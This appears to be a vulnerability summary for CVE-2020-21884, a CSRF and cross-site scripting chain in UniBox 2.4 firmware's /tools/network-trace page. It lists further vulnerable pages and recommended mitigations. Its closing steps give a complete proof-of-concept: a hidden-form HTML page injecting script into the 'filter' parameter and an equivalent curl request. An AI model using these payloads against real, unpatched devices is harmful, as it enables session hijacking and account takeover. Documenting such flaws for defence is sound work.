CVE-2020-21884

An attacker crafts a malicious HTML page containing a hidden form that submits a POST request to the victim's UniBox device at /tools/network-trace [ref_id=1]. The form includes a payload in the "filter" parameter that injects JavaScript (e.g., `"><script>alert(document.cookie)</script>`) [ref_id=1]. If the victim is already authenticated to the UniBox web interface (i.e., has a valid PHPSESSID cookie), submitting this form executes the attacker's script in the context of the device's web session, leading to account takeover [ref_id=1]. The attack is remote and requires no special network position beyond the victim visiting the crafted URL [ref_id=1].

The primary vulnerable endpoint is /tools/network-trace, which accepts a POST request with parameters including "filter" that are not sanitized [ref_id=1]. Additional pages identified as XSS-vulnerable include /authentication/list_users, /authentication/list_byod?usertype=raduser, /reports/dhcp_leases, and /go?rid=202 [ref_id=1]. The advisory does not specify the underlying source files or codebase language beyond noting the web interface runs on UniBox 2.4 firmware [ref_id=1].

No patch or vendor fix has been published; the researcher noted that after disclosure in January 2020 the vendor responded but no further communication was received [ref_id=1][ref_id=2]. The advisory recommends implementing CSRF tokens on all state-changing forms and properly sanitizing user-supplied input on the /tools/network-trace page to prevent XSS [ref_id=1]. Without these countermeasures, the device remains vulnerable to the described XSRF attack chain.

1. Ensure the victim is logged into the UniBox web interface (has a valid PHPSESSID cookie). 2. Host the following HTML page and trick the victim into opening it: `<html><body><script>history.pushState('', '', '/')</script><form action="http://IP-OF-Device/tools/network-trace" method="POST"><input type="hidden" name="port" value="lan" /><input type="hidden" name="duration" value="600" /><input type="hidden" name="noofpackets" value="100" /><input type="hidden" name="sizelimit" value="128" /><input type="hidden" name="filter" value='"/><script>alert(document.cookie)</script>' /><input type="hidden" name="formsubmit" value="Start Trace" /><input type="submit" value="Submit request" /></form></body></html>` [ref_id=1]. 3. Alternatively, use the provided curl command: `curl -i -s -k -X $'POST' -H $'Host: IP-OF-Device' -H $'Cookie: PHPSESSID=86i9fsqxxxxxxxxxxxxxx' --data-binary $'port=lan&duration=600&noofpackets=100&sizelimit=128&filter=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&formsubmit=Start+Trace' $'http://ip-of-device/tools/network-trace'` [ref_id=1].